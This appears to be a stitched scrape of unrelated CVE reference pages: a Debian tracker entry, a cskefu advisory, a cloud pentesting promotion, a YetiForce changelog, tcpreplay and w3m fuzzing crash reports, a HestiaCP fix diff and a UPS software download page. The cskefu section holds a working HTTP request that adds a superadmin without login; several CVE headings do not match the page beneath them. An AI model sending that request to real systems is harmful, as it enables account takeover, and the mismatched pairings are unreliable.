A flaw was found in the VirGL virtual OpenGL renderer (virglrenderer). The virgl did not properly initialize memory when allocating a host-backed memory resource. A malicious guest could use this flaw to mmap from the guest kernel and read this uninitialized memory from the host, possibly leading to information disclosure.

**Name**

CVE-2022-0175

**Description**

memory initialization issue in vrend\_resource\_alloc\_buffer() can lead to info leak

**Source**

CVE (at NVD; CERT, LWN, oss-sec, fulldisc, bugtraq, EDB, Metasploit, Red Hat, Ubuntu, Gentoo, SUSE bugzilla/CVE, Mageia, GitHub advisories/code/issues, web search, more)

**Vulnerable and fixed packages**

The table below lists information on source packages.

Source Package

Release

Version

Status

virglrenderer (PTS)

buster

0.7.0-2

fixed

bookworm, sid, bullseye

0.8.2-5

fixed

The information below is based on the following data on fixed versions.

Package

Type

Release

Fixed Version

Urgency

Origin

Debian Bugs

virglrenderer

source

(unstable)

(not affected)

**Notes**

\- virglrenderer <not-affected> (Introduced in 0.9.0 with refactor)  
https://bugzilla.redhat.com/show\_bug.cgi?id=2039003  
https://gitlab.freedesktop.org/virgl/virglrenderer/-/merge\_requests/654  
Code refactored in https://gitlab.freedesktop.org/virgl/virglrenderer/-/commit/7899e057327848300b18d8f03aa3789e00ed0221 (0.9.0)  
Fixed by: https://gitlab.freedesktop.org/virgl/virglrenderer/-/commit/b05bb61f454eeb8a85164c8a31510aeb9d79129c

CVE-2022-0175: CVE-2022-0175

Insecure permissions in cskefu v7.0.1 allows unauthenticated attackers to arbitrarily add administrator accounts.

**概述**

存在添加管理员接口，调用该接口时没有对当前用户进行校验，导致未登录状态下可添加管理员账户。  
There is an interface to add an administrator. When calling this interface, the current user is not verified, so that an administrator account can be added when not logged in.

**数据包（payload）：**

GET /addAdmin?username\=admin666&password\=admin666123&email\=admin666@admin6666.com&mobile\=17777777776&superadmin\=true HTTP/1.1
Host: localhost
User\-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:101.0) Gecko/20100101 Firefox/101.0
Accept: text/html,application/xhtml+xml,application/xml;q\=0.9,image/avif,image/webp,\*/\*;q\=0.8
Accept\-Language: zh\-CN,zh;q\=0.8,zh\-TW;q\=0.7,zh\-HK;q\=0.5,en\-US;q\=0.3,en;q\=0.2
Accept\-Encoding: gzip, deflate
DNT: 1
Connection: close
Upgrade\-Insecure\-Requests: 1
Sec\-Fetch\-Dest: document
Sec\-Fetch\-Mode: navigate
Sec\-Fetch\-Site: none
Sec\-Fetch\-User: ?1
Cache\-Control: max\-age\=0

\*\* 测试截图（Test screenshot）： \*\*  

根据给出的URL  
According to the given URL  
http://localhost/?schema=http&port=80&hostname=localhost&subtype=user&maintype=apps&typename=methodName&orgi=cskefu&webimport=8036&sessionid=f8dbdd6d51dd44788ccad36c02e7958b&models=cca&models=chatbot&models=report&models=entim&models=contacts&ip=172.18.0.1&userExpTelemetry=on

跳转至管理界面  
Jump to the management interface  

**漏洞分析（Vulnerability analysis）**  
漏洞源码（Vulnerability source code）：

 @RequestMapping("/addAdmin")
    @Menu(type = "apps", subtype = "user", access = true)
    public ModelAndView addAdmin(HttpServletRequest request, HttpServletResponse response, @Valid User user) {
        String msg = "";
        msg = validUser(user);
        if (StringUtils.isNotBlank(msg)) {
            return request(super.createView("redirect:/register.html?msg=" + msg));
        } else {
            user.setUname(user.getUsername());
            user.setAdmin(true);
            if (StringUtils.isNotBlank(user.getPassword())) {
                user.setPassword(MainUtils.md5(user.getPassword()));
            }
            user.setOrgi(super.getOrgi());
            userRepository.save(user);
        }
        ModelAndView view = this.processLogin(request, user, "");
        return view;
    }

    private String validUser(User user) {
        String msg = "";
        User tempUser = userRepository.findByUsernameAndDatastatus(user.getUsername(), false);
        if (tempUser != null) {
            msg = "username\_exist";
            return msg;
        }
        tempUser = userRepository.findByEmailAndDatastatus(user.getEmail(), false);
        if (tempUser != null) {
            msg = "email\_exist";
            return msg;
        }
        tempUser = userRepository.findByMobileAndDatastatus(user.getMobile(), false);
        if (tempUser != null) {
            msg = "mobile\_exist";
            return msg;
        }
        return msg;
    }

addAdmin接口未进行权限校验，未登录状态可直接调用  
The addadmin interface does not perform permission verification, and can be called directly in the unregistered state

增加用户前，判断传入的用户是否有效  
Before adding users, judge whether the incoming users are valid  

为了顺利到达最后一个return，传入的username，email，mobile都必须为数据库中的唯一值  
n order to successfully reach the last return, the username, email and mobile passed in must be unique values in the database  

当返回的msg为空时，我们就可以继续增加用户的操作，且将添加的用户设置为管理员  
When the returned MSG is empty, we can continue to add users and set the added users as administrators  

**操作系统**

*   macOS or Mac OSX
*   Windows
*   Linux(Debian, CentOS, Ubuntu, etc.)

**代码版本**

代码版本 <= 7.0.1

**祝福与不祝福**

春松客服之所以开源，是基于这样一种信念：爱人也是爱己，利他也是利己。  
对人和人美好关系的向往，对人潜力的信任。让我们相信因春松客服而受益的人，会回报给春松客服开源社区，我们所有贡献者基于共赢的信念合作。  
回报方式包括：提交 PR、购买春松客服相关的付费产品和服务等。

因春松客服受益，而不回报开源社区的用户，我们不欢迎使用春松客服：我们开源并不是为了你们，你们是不被祝福的。

**Open Source for the World**

CVE-2022-36521: 【安全漏洞】前台未授权增加管理员账号 · Issue #724 · chatopera/cskefu

Alternative cloud providers offer streamlined capabilities for penetration testing, including more accessible tools, easy deployment, and affordable pricing.

Cloud data breaches are on the rise. In 2022, 45% of organizations reported a breach or compliance audit failure, representing a 5% increase from the year before. And just 11% reported that more than 80% of their sensitive data in the cloud is encrypted. With the help of red-team penetration testing, infosec developers have the ability to patch vulnerabilities before they reach end users. And as attacks continue to expand, red-team activities in the cloud are an absolute must for most organizations, and take up a growing chunk of infosec developers' time.

As a crucial layer of protection for businesses, infosec teams need technologies that make their work easier. Yet today, many cloud providers make security complex by overcomplicating either the deployment of required infrastructure or the pricing structure. This has to change. It's time for cloud providers to empower infosec developers with the right tools, platforms, and pricing to support essential testing and security work. Or risk breaches that cost money, reputation, and time.

**Companies Deserve Full Capabilities and Affordable Costs**

Security starts with the right strategy and tool set. When it comes to red-team activities, Kali is a top choice. A lightweight Linux distribution, Kali is open source and Debian-based, with a full suite of security testing tools. But Kali can be hard to use on some of the most popular cloud providers, like Amazon Web Services (AWS).

For one thing, deploying Kali Linux onto a cloud instance can be tedious and time consuming, especially if installing directly from an ISO using workarounds or exporting from a local VM. For example, though a penetration tester can set up a Kali Linux instance on Amazon's cloud, it's only available as an Amazon Machine Image (AMI) that runs Kali Linux on the Amazon Marketplace. This image doesn't include the full range of Kali's capabilities.

In addition to a challenging manual setup process, companies also need to grapple with pricing complexity — a problem that doesn't just affect finance teams but trickles down to developers too. Depending on the scope, size, and thoroughness of the engagement, penetration testing may require many instances and significant amounts of egress. On major cloud providers, these needs can run up a large bill. On top of that, pricing complexity may make these costs difficult to accurately estimate, placing an unfair responsibility on infosec professionals, developers, and business owners that may be expected to foresee (and prevent) high price tags.

While enterprise companies may not be concerned about these factors — they may have massive infosec teams to handle setup and deep pockets to deal with costs — small businesses will likely be more wary. As they grapple with a talent shortage and relatively tight budgets, they need partners that can support them in a different, more holistic way. Enter alternative cloud providers.

Though Kali is widely available, deploying it with a partner that offers deeper functionality and more thorough support at a fair cost is simply more practical, especially for SMBs. For security professionals in the cloud space to get the most of Kali, it must be offered as an officially supported distribution that can easily be deployed on any cloud instance. This ensures that the full range of testing opportunities and configurations supported by Kali Linux can easily run in the cloud. Akamai Linode offers Kali this way, giving end users access not only via the distribution but also as an app in Linode's marketplace. Another key differentiator is that alternative providers typically offer a higher level of support than other providers, helping SMBs tackle that tough initial setup, often with no added costs.

Pricing in general, not just for support, is more accessible through alternative providers as well. These players not only have more predictable, transparent costs thanks to flat rates, but some — like Linode — have generous transfer allowances and comparatively low overage costs. That's game-changing for penetration testers that deal with plenty of egress. Without worry about incurring significant extra costs, they can freely run the testing they need to protect their organizations.

**Consider Alternative Cloud Providers for Security Testing**

Every organization using cloud, no matter how small, should be doing security testing: cloud misconfiguration is the initial attack vector for 15% of all data breaches. And with breaches costing companies as much as $4 million dollars, they simply can't afford the risk.

As threats continue to grow, thorough and well-honed penetration testing is more important now than ever. And infosec teams need support. Let's arm these vital teams with key tools, easier deployment, and clearer, more affordable pricing schemes.

**About the Author**

    

Billy Thompson is a Solutions Engineering Manager on Akamai, Linode Compute, helping customers design portable architectures, and deploy them at scale for technical and business teams. Billy holds a degree in information security and has a special interest in IaC, Kubernetes, big data engineering, and Python and Rust programming languages. He is a longtime Arch Linux user and vegan, and never knows which to tell people first. Outside of work, he studies jujitsu, muay thai, and boxing. He also volunteers at his home for fostering and acclimating rescue dogs.

For Penetration Security Testing, Alternative Cloud Offers Something Others Don't

Cross-site Scripting (XSS) - Stored in GitHub repository yetiforcecompany/yetiforcecrm prior to 6.4.0.

Permalink

Browse files

YetiForce CRM ver. 6.4.0 (#16359)

\* Added improvements in record collector

\* Integration with UaYouControl.php (#16293)

Co-authored-by: Mariusz Krzaczkowski <m.krzaczkowski@yetiforce.com>

\* Integration with UaYouControl.php (#16293)

\* Add external link to NoBrregEnhetsregisteret. (#16292)

\* Add external link to NoBrregEnhetsregisteret. #16292

\* Add NorthData to RecordCollectors. (#16278)

\* Add NorthData to RecordCollectors.

\* Change docs.

Co-authored-by: Mariusz Krzaczkowski <m.krzaczkowski@yetiforce.com>

\* Fix #16311

\* Added conditions wizard for 'Update related record' workflow action

\* Add NorthData to RecordCollectors. (#16278)

\* Code improvements

\* Added improvements in record collector

\* Zefix integraion \[in progress\] (#16281)

\* Zefix integraion \[in progress\]

\* ChZefix integration.

Co-authored-by: Mariusz Krzaczkowski <m.krzaczkowski@yetiforce.com>

\* Improved workflow action

\* Added improvements in record collector

\* Improvements in the store

\* Update RecordCollector tests

\* Code improvements

\* Improved ConfReport

\* languages/en-US/Other/RecordCollector.json

\* Improved change module type

\* Improved default dashboard in api portal

\* Fix Send PDF workflow task

\* Improved default dashboard in api

\* Fixed attachments in 'Emails to send' panel

\* lib\_roundcube 0.3.0 Roundcube Webmail 1.6.0

\* tests

\* tests

\* Update tests.yml

\* Added improvements in record collector

\* tests/setup/dependency.sh

\* .github/workflows/tests.yml

\* .github/workflows/tests.yml

\* .github/workflows/tests.yml

\* Code improvements

\* Update dependencies

\* Added minor improvements

\* tests

\* Added improvements in record collector

\* Added improvements in record collector

\* Added minor improvements

\* Added minor improvements

\* Added minor improvements

\* Improved import file button

\* Improved imap connection

\* Fix #16317 - list view entries count

\* Added minor code improvements

\* Improved menu items

\* Added improvements in record collector

\* Fix gantt view (#15772)

\* Added improvements in record collector

\* Added improvements in record collector

\* Added improvements in record collector

\* Updated graphics in store

\* Update install translations

\* Update fonts

\* Improved OSSMail template

\* Updated graphics in store

\* Update fonts

\* tests

\* tests Validator

\* Update icons

\* Improved widgets permissions (#15613)

\* Increase scrolling speed (#15031)

\* Added tracking to media management

\* Added improvements in record collector

\* Added improvements in record collector

\* Added improvements in record collector

\* Added minor code improvements

\* tests

\* Added minor code improvements

\* Fixed #15164 (#16319)

\* Some changes in Import module (#16318)

\* Code formatting

\* Added improvements in record collector

\* Change the library "sonata-project / google-authenticator" to "pragmarx/google2fa"

\* Update dependencies

\* Update dependencies

\* Updated \*.min and \*.map files

\* Change the library "sonata-project / google-authenticator" to "pragmarx/google2fa"

\* Added minor improvements in Composer::install

\* Update dev dependency

\* Added dropdown button to record collectors (#16322)

\* Corrected  Record collectors table width (#16323)

\* Fixed #15183 modulesMapRelatedFields don\`t work correct for multipicklist

\* Added minor improvements in Credits

\* Fix edit view header links

\* Improved Inventory panel and PDF widget

\* Added improvements in record collector

\* Added improvements in record collector

\* Update install translations

\* #16282 Improved the handler from getting coordinates to the map

\* Added minor code improvements

\* Fixed getting reference module in inventory name field (#16329)

\* Missing icons update

\* Improved tree field type

\* Improved tests and some code

\* Fix tree field type

\* Fix scheme for tree data table

\* Improved switch users

\* Improved YetiForce CLI

\* \[PROD\](renovate) Update dependency github/super-linter to v4.9.6 (#16324)

Co-authored-by: renovate\[bot\] <29139614+renovate\[bot\]@users.noreply.github.com>

\* Bump giggsey/libphonenumber-for-php from 8.12.52 to 8.12.53 (#16331)

Bumps \[giggsey/libphonenumber-for-php\](https://github.com/giggsey/libphonenumber-for-php) from 8.12.52 to 8.12.53.
- \[Release notes\](https://github.com/giggsey/libphonenumber-for-php/releases)
- \[Commits\](giggsey/libphonenumber-for-php@8.12.52...8.12.53)

---
updated-dependencies:
- dependency-name: giggsey/libphonenumber-for-php
  dependency-type: direct:production
  update-type: version-update:semver-patch
...

Signed-off-by: dependabot\[bot\] <support@github.com>

Co-authored-by: dependabot\[bot\] <49699333+dependabot\[bot\]@users.noreply.github.com>

\* Improved switch users

\* Improved switch users

\* Unused code has been removed

\* Fix tree field type

\* Added improvements in record collector

\* Improved integration with DAV

\* Improved conditions wizard for 'Update related record' workflow action

\* Fixed focus to search text field when click on select2 drop down in modal window

\* Added improvements in record collector

\* Added minor code improvements

\* Improved ConfReport

\* Improved .htaccess

\* Added minor code improvements

\* Improved ConfReport

\* Fix icon on tree field type and change icon management view

\* Removed unused code. "Is added" - condition in workflows (#16321)

\* Correct setting of check boxes of Inventory boolean fields depending on their values. (#16326)

\* Update Inventory.js
Now the check-boxes of Inventory boolean fields will be set correctly regarding to their content.

\* README.md (#16332)

\* Improve inventory auto fill

\* Improved getting data from smtp (#16334)

\* Fixed #13136 (#16335)

\* Improved DB structure for map table cache

\* Improved updating payment status (#16327)

\* Improved updating payment status

\* Corrected translation (#16336)

\* Removed translation (#16337)

\* A functionality has been added to unlock e-mail accounts

\* Fix #13486

\* Update dependencies

\* mbstring.func\_overload

\* Added priority to CalendarActivities and OverdueActivities dashboard … (#16276)

\* Added priority to CalendarActivities and OverdueActivities dashboard widgets

\* Added improvement

\* Hidden icon for previewing replies in comments (#16339)

\* The display of the multi email field has been improved

\* Added working time counter widget. (#16316)

\* Added working time counter widget.

\* Added translation

\* Added improvements

\* Removed varialbe

\* Corrected comment

\* Added title to buttons

\* Added type to variable

\* Removed redundant characters

\* Added working time counter widget. #16316

\* Added minor improvements

\* Improoved dashboard titles

\* Updated \*.min and \*.map files

\* Added minor improvements in languages

\* Updated translation

\* Improvements have been added to the integration with WAPRO ERP

\* Update install translations

\* Update translations

\* Update translations

\* Added improvements in record collector

\* Added improvements in record collector

\* Improved input data cleanup

\* Improved RSS

\* Improved Rss

\* Update all Yarn dependencies (2022-08-15) (#16344)

Co-authored-by: depfu\[bot\] <23717796+depfu\[bot\]@users.noreply.github.com>

\* Added improvements in record collector

\* Improvements in the mechanism of generating PDF files

\* YetiForcePDF update v0.1.40 & Update dependencies

\* Improved some config templates

\* Added minor improvements

\* Remove unnecessary code

\* .github/workflows/actions.yml

\* .github/workflows/actions.yml

\* .github/workflows/tests.yml

\* .github/workflows/tests.yml

\* .github/workflows/tests.yml

\* Improved Db importer/updater

\* Added buttons to the Working hours counter widget (#16340)

\* Added buttons to the Working hours counter widget

\* Added translations

\* Improved widget

\* Added button lock when starting timing

\* Update translations

\* Added missing translation

\* .github/workflows/tests.yml

\* .github/workflows/tests.yml

\* .github/workflows/tests.yml

\* Added missing translation

\* .github/workflows/tests.yml

\* Removed Translation (#16347)

Co-authored-by: Radosław Skrzypczak <r.skrzypczak@yetiforce.com>

\* Update install translations

\* Added minor improvement in get actual version of PHP

\* Update install translations

\* Updated \*.min and \*.map files

\* Redundant code has been removed

\* .github/workflows/tests.yml

\* .github/workflows/tests.yml

\* .github/workflows/tests.yml

\* Improved RSS

\* Added improvements

\* Update DEV dependencies

\* Fix Completions initialization in comments widget (#16348)

\* Update fonts

\* Fixed sending files in API for PUT method

\* Update DEV dependencies

\* Improved valid of time in Business Hours (#16351)

\* Improved executing workflow when an unsupported operator is selected (#16352)

\* Improved executing workflow when an unsupported operator is selected

\* Improved getting translation (#16350)

\* Improved Importer

\* Improved working time counter widget

\* Improved api

\* Expansion of the tests

\* Expansion of the tests

\* tests

\* Update DEV dependencies

\* Improved Rss

\* tests

\* Value display secured

\* Added improvements

\* Improved index name

\* Improved validation of quantity field (#16355)

\* Improved validation of quantity field

\* Improved code

\* Add missing picklist dependencies

\* Added  validation whether at least one business day has been selected in the Business hours module (#16356)

\* Compile js

\* Moved swagger file

\* Improved swagger generating functions

\* Added minor improvements

\* Fixed issue with date format

\* Added improvements

\* Fixed a bug when selecting all users in the calendar quick edit view (#16357)

\* Improved swagger generating functions

\* Added improvements

\* Added improvements

\* Added improvements

\* Improved Address Search panel

\* Improved Emails to send panel

\* Fix action name

\* Fix description in docBlock

\* tests/Settings/ApiAddress.php

\* Compile js

\* tests/Settings/ApiAddress.php

\* tests/Settings/ApiAddress.php

\* Remove html unnecessary class

\* Fixed #14266 (#16349)

\* \[PROD\](renovate) Update debian Docker tag to v11 (#16341)

Co-authored-by: renovate\[bot\] <29139614+renovate\[bot\]@users.noreply.github.com>

\* Improved anonymization

\* Added improvements

\* Update install translations

\* Improved config class

\* Added improvements

\* Improved generatedtype for some fields

\* Fixed #15631 (#16358)

\* Added improvements

\* Improved block sequence

\* 6.4.0

Co-authored-by: rembiesa <103192653+rembiesa@users.noreply.github.com>
Co-authored-by: Radosław Skrzypczak <r.skrzypczak@yetiforce.com>
Co-authored-by: Adrian Koń <a.kon@yetiforce.com>
Co-authored-by: bmankowski <bmankowski@gmail.com>
Co-authored-by: Arek Solek <arkadiusz\_s9887@wp.pl>
Co-authored-by: renovate\[bot\] <29139614+renovate\[bot\]@users.noreply.github.com>
Co-authored-by: dependabot\[bot\] <49699333+dependabot\[bot\]@users.noreply.github.com>
Co-authored-by: Jared Ramon Elizan <elizanjaredr@gmail.com>
Co-authored-by: depfu\[bot\] <23717796+depfu\[bot\]@users.noreply.github.com>

*   Loading branch information

CVE-2022-1340: YetiForce CRM ver. 6.4.0 (#16359) · YetiForceCompany/YetiForceCRM@2c14baa

The component tcprewrite in Tcpreplay v4.4.1 was discovered to contain a heap-based buffer overflow in get_l2len_protocol at common/get.c:344. NOTE: this is different from CVE-2022-27941.

You are opening a _bug report_ against the Tcpreplay project: we use  
GitHub Issues for tracking bug reports and feature requests.

If you have a question about how to use Tcpreplay, you are at the wrong  
site. You can ask a question on the tcpreplay-users mailing list  
or on Stack Overflow with \[tcpreplay\] tag.  
General help is available here.

If you have a build issue, consider downloading the latest release

Otherwise, to report a bug, please fill out the reproduction steps  
(below) and delete these introductory paragraphs. Thanks!

**Describe the bug**  
A clear and concise description of what the bug is.  
There is a heap-overflow bug in get\_ipv6\_next. Different from #716 (The crash point is in line 322, ntohs(eth_hdr->ether_type);), this bug is triggered in line 344 (pktdata[l2_net_off] >> 4).

**To Reproduce**  
Steps to reproduce the behavior:

1.  export CC=clang && export CFLAGS="-fsanitize=address -g"
2.  ./autogen.sh && ./configure --disable-shared --disable-local-libopts && make clean && make -j8
3.  tcpprep --auto=bridge --pcap=POC --cachefile=/dev/null

**Expected behavior**  
A clear and concise description of what you expected to happen.  
The program does not crash.

**Screenshots**  
If applicable, add screenshots to help explain your problem.  

**System (please complete the following information):**

*   OS: Debian
*   OS version: buster
*   Tcpreplay Version: 09f0774

**Additional context**  
Add any other context about the problem here.  
**POC**  
poc.zip

CVE-2022-37048: [Bug] heap-overflow in get.c:344 · Issue #735 · appneta/tcpreplay

The component tcprewrite in Tcpreplay v4.4.1 was discovered to contain a heap-based buffer overflow in get_ipv6_next at common/get.c:713. NOTE: this is different from CVE-2022-27940.

You are opening a _bug report_ against the Tcpreplay project: we use  
GitHub Issues for tracking bug reports and feature requests.

If you have a question about how to use Tcpreplay, you are at the wrong  
site. You can ask a question on the tcpreplay-users mailing list  
or on Stack Overflow with \[tcpreplay\] tag.  
General help is available here.

If you have a build issue, consider downloading the latest release

Otherwise, to report a bug, please fill out the reproduction steps  
(below) and delete these introductory paragraphs. Thanks!

**Describe the bug**  
There is a heap-overflow bug in get\_ipv6\_next. Different from #718 (The crash point is in line 679, *((int*)((u_char *)exthdr + len))), this bug is triggered in line 713 (*((int*)((u_char *)exthdr + len)) > maxlen).

**To Reproduce**  
Steps to reproduce the behavior:

1.  export CC=clang && export CFLAGS="-fsanitize=address -g"
2.  ./autogen.sh && ./configure --disable-shared --disable-local-libopts && make clean && make -j8
3.  ./src/tcprewrite -o /dev/null -i POC

**Expected behavior**  
A clear and concise description of what you expected to happen.  
The program does not crash.

**Screenshots**  

**System (please complete the following information):**

*   OS: Debian
*   OS version: buster
*   Tcpreplay Version: 09f0774

**Additional context**  
**POC**  
poc.zip

CVE-2022-37047: [Bug] heap-overflow in get.c:713 · Issue #734 · appneta/tcpreplay

The component tcpprep in Tcpreplay v4.4.1 was discovered to contain a heap-based buffer overflow in parse_mpls at common/get.c:150. NOTE: this is different from CVE-2022-27942.

You are opening a _bug report_ against the Tcpreplay project: we use  
GitHub Issues for tracking bug reports and feature requests.

If you have a question about how to use Tcpreplay, you are at the wrong  
site. You can ask a question on the tcpreplay-users mailing list  
or on Stack Overflow with \[tcpreplay\] tag.  
General help is available here.

If you have a build issue, consider downloading the latest release

Otherwise, to report a bug, please fill out the reproduction steps  
(below) and delete these introductory paragraphs. Thanks!

**Describe the bug**  
A clear and concise description of what the bug is.  
There is a heap-overflow bug in get.c:150. This bug is different from #719 that crashes in get.c:118.

**To Reproduce**  
Steps to reproduce the behavior:

1.  export CC=clang && export CFLAGS="-fsanitize=address -g"
2.  ./autogen.sh && ./configure --disable-shared --disable-local-libopts && make clean && make -j8
3.  ./src/tcpprep --auto=bridge --pcap=POC --cachefile=/dev/null

**Expected behavior**  
A clear and concise description of what you expected to happen.  
The program does not crash.

**Screenshots**  
If applicable, add screenshots to help explain your problem.  

**System (please complete the following information):**

*   OS: Debian
*   OS version: buster
*   Tcpreplay Version: 09f0774

**Additional context**  
Add any other context about the problem here.  
**POC**  
poc.zip

CVE-2022-37049: [Bug] heap-overflow in get.c:150 · Issue #736 · appneta/tcpreplay

An issue was discovered in HestiaCP before v1.3.5. Attackers are able to arbitrarily install packages due to values taken from the pgk [] parameter in the update request being transmitted to the operating system's package manager.

Permalink

Browse files

Merge remote-tracking branch 'jaapmarcus/fix/prevent-install-non-cont…

…rolled-package' into main

*   Loading branch information

Kristan Kenney committed

Mar 30, 2021

2 parents 32ef8a2 + 9a1fccd commit 27556a9a43aeaf308b33be224c2e70f2011574e6

Showing **2 changed files** with **7 additions** and **0 deletions**.

*   *   v-update-sys-hestia
*   *   main.sh

@@ -32,6 +32,7 @@ source $HESTIA/conf/hestia.conf

  

# Checking arg number

check\_args '1' "$#" 'PACKAGE'

is\_hestia\_package "hestia,hestia-nginx,hestia-php" "$package"

  

# Perform verification if read-only mode is enabled

check\_hestia\_demo\_mode

@@ -1154,6 +1154,12 @@ multiphp\_default\_version() {

echo "$sys\_phpversion"

}

  

is\_hestia\_package(){

if \[ \-z "$(echo $1 | grep -w $2)" \]; then

check\_result $E\_INVALID "$2 package is not controlled by hestiacp"

fi

}

  

# Run arbitrary cli commands with dropped privileges

# Note: setpriv --init-groups is not available on debian9 (util-linux 2.29.2)

# Input:

**0 comments on commit 27556a9**

Please sign in to comment.

CVE-2021-30070: Merge remote-tracking branch 'jaapmarcus/fix/prevent-install-non-cont… · hestiacp/hestiacp@27556a9

upsMonitor in ViewPower (aka ViewPowerHTML) 1.04-21012 through 1.04-21353 has insecure permissions for the service binary that enable an Authenticated User to modify files, allowing for privilege escalation.

 ViewPower Management Software 

**ViewPowerHTML 1.04-21353** is an advanced UPS management software. It allows remote monitor and manage from one to multiple UPSs in a networked environment, either LAN or INTERNET. It can not only prevent data loss from power outage and safely shutdown systems, but also store programming data and scheduled shutdown UPSs.  

  

**Feature summary:**  
• Allows control and monitoring of multiple UPSs via LAN and INTERNET  
• Supports auto and manual online upgrade  
• User-friendly power analysis graph: event statistics, history data chart export  
• Real-time dynamic graphs of UPS data (voltage, frequency, load level, battery level)  
• Safely OS shutdown and protection from data loss during power failure  
• Warning notifications via audible alarm, broadcast, mobile messenger, and e-mail  
• Scheduled UPS on/off, battery test, programmable outlet control, and audible alarm control  
• Password security protection and remote access management  
• Supports multiple languages: English, Chinese, French, German, Spanish, Russian, Portuguese, Ukrainian, Italian, Polish, Czech, Turkish   Download the software according to your requested operation system in your computer system. Supported browser versions include IE browser (not support the version older than IE10), Google, Chrome, Firefox,. All browers should support html5.

Software Version

Type

Download Link

Supported OS

ViewPower Network Edition  

Software for Windows® (V.HTML 1.04-21353)

Windows® 7 / 8 / 10 (32-bit & x64-bit) / 11  
Windows® Server 2012 / 2016 / Windows SBS 2011

Windows XP 2003 /2008

Windows® Server 2019 (32-bit & x64-bit)

User Manual

Windows® 7 / 8 / 10 (32-bit & x64-bit) / 11  
Windows® Server 2012 / 2016 / 2019 (32-bit & x64-bit) Windows SBS 2011

Software for MAC x86-64 (V.HTML 1.04-21353) Intel Chip

Mac OS 10.6/10.7/10.8/10.9/10.10/10.11/10.12/10.13/10.14/10.15 /11.x (intel x64-bit)

Software for MAC x86-64 (V.HTML 1.04-21353) M1 Chip

Mac OS 11.x (M1)

Software for Linux  
(V.HTML 1.04-21353)

Graphic mode operation:

Linux Cent OS 5/ 6 / 7 (32-bit )  
Linux Debian 6.x/8.x/10.x (32bit)  
Linux Fedora 5/ 17 (32bit)  
Linux Mint 14.x/19.x (32bit)  
Linux OpenSUSE 10/ 11 / 12/ 13 (32bit)  
Linux RedHat Enterprise AS3, AS5 AS6 (32bit)  
Linux RedHat Enterprise 5/8/9 (32-bit)  
Linux Ubuntu 8/ 9/ 10/ 12/ 14/ 15/ 16 (32-bit )  

Text mode operation:

Graphic mode operation:

Linux CentOS 5/ 6/ 7/ 8 (64bit)  
Linux Debian 6/ 7/ 8/ 10 (64bit)  
Linux Fedora 5/ 17/ 33 (64-bit)  
Linux Mint 19/ 20 (64bit)  
Linux OpenSUSE 10/ 11/ 12/ 13 (64bit)  
Linux RedHat Enterprise AS6 (64bit)  
Linux SUSE 10/ 11/ 12 (64bit)  
Linux Ubuntu 10/ 11/ 12/ 14/ 15/ 16/ 18/ 19/ 20 (64bit)  

Text mode operation:

ESXI Shutdown Wizard

User Manual

ESXI 4.x/ 5.x/6.x

CVE-2021-30490: Software download for Uninterruptible Power Supply

There is an out-of-bounds write in checkType located in etc.c in w3m 0.5.3. It can be triggered by sending a crafted HTML file to the w3m binary. It allows an attacker to cause Denial of Service or possibly have unspecified other impact.

Hello, I found a out of bound write in w3m, function checkType, etc.c:441 while testing my new fuzzer.

**step to reproduce**

export CC="gcc -fsanitize=address -g" ./configure --disable-shared && make -j8  
./w3m $POC

**Environment**

*   Ubuntu 22.04 (docker image)
*   w3m latest commit c515ea8
*   gcc 11.2.0

**ASan log**

    AddressSanitizer:DEADLYSIGNAL
    =================================================================
    ==1795279==ERROR: AddressSanitizer: BUS on unknown address (pc 0x5639811267b7 bp 0x7f4212857ffe sp 0x7ffdc528ad90 T0)
    ==1795279==The signal is caused by a WRITE memory access.
    ==1795279==Hint: this fault was caused by a dereference of a high value address (see register values below).  Dissassemble the provided pc to learn which register was used.
        #0 0x5639811267b7 in checkType /validate/w3m/etc.c:441
        #1 0x5639810ea5e2 in loadBuffer /validate/w3m/file.c:7717
        #2 0x563981110094 in loadSomething /validate/w3m/file.c:230
        #3 0x563981110094 in loadGeneralFile /validate/w3m/file.c:2286
        #4 0x5639810ab87d in main /validate/w3m/main.c:1053
        #5 0x7f42159b4d8f in __libc_start_call_main ../sysdeps/nptl/libc_start_call_main.h:58
        #6 0x7f42159b4e3f in __libc_start_main_impl ../csu/libc-start.c:392
        #7 0x5639810af284 in _start (/validate/w3m/w3m+0xb3284)
    
    AddressSanitizer can not provide additional info.
    SUMMARY: AddressSanitizer: BUS /validate/w3m/etc.c:441 in checkType
    ==1795279==ABORTING
    

**Credit**

Han Zheng  
NCNIPC of China  
Hexhive

**POC**

poc0.zip

Copy link

Contributor

****rkta** commented Aug 9, 2022**

On Sun, Aug 07, 2022 at 04:27:40AM -0700, Han Zheng wrote: Hello, I found a out of bound write in w3m, function checkType, etc.c:441 while testing my new fuzzer. ## step to reproduce export CC="gcc -fsanitize=address -g" ./configure --disable-shared && make -j8 ./w3m $POC

Can't reproduce on Debian with the 'poc0' from the attached zip file.

Sorry, I write the wrong command, the command is ./w3m -dump $POC.

Copy link

Author

****kdsjZh** commented Aug 9, 2022 •**

if it didn't work, could you try docker ubuntu 22.04 image with following command? Or you could give me the debian version you use

    apt update && apt install wget git unzip gcc g++ make libgc-dev libtinfo-dev -y
    git clone https://github.com/tats/w3m && pushd w3m
    export CC="gcc -fsanitize=address -g" && ./configure --disable-shared && make -j8
    ./w3m -dump $PATH_TO_POC
    
    

I try again and it works for me.

Copy link

Contributor

****rkta** commented Aug 9, 2022**

On Tue, Aug 09, 2022 at 07:55:19AM -0700, Han Zheng wrote: if it didn't work,

Can not reproduce with '-dump' either.

could you try ubuntu 22.04 image with following command?

I currently don't have time to setup a VM, maybe at the weekend, sorry.

Or you could give me the debian version you use

Debian stable

\`\`\` apt update && apt install wget git unzip gcc g++ make libgc-dev libtinfo-dev -y git clone https://github.com/tats/w3m && pushd w3m export CC="gcc -fsanitize=address -g" && ./configure --disable-shared && make -j8 ./w3m -dump $PATH\_TO\_POC \`\`\` I try again and it works for me.

Can you reduce the input file? Does it also reproduce with only the first half or the second half?

Copy link

Author

****kdsjZh** commented Aug 9, 2022 •**

I try debian stable in docker image and it still works.

> I currently don't have time to setup a VM, maybe at the weekend, sorry.

I mean you can install docker in your debian and copy following command :

    docker pull ubuntu:22.04 && docker run -it ubuntu:22.04 bash
    ## now step into the container
    apt update && apt install wget git unzip gcc g++ make libgc-dev libtinfo-dev -y
    git clone https://github.com/tats/w3m && pushd w3m
    export CC="gcc -fsanitize=address -g" && ./configure --disable-shared && make -j8
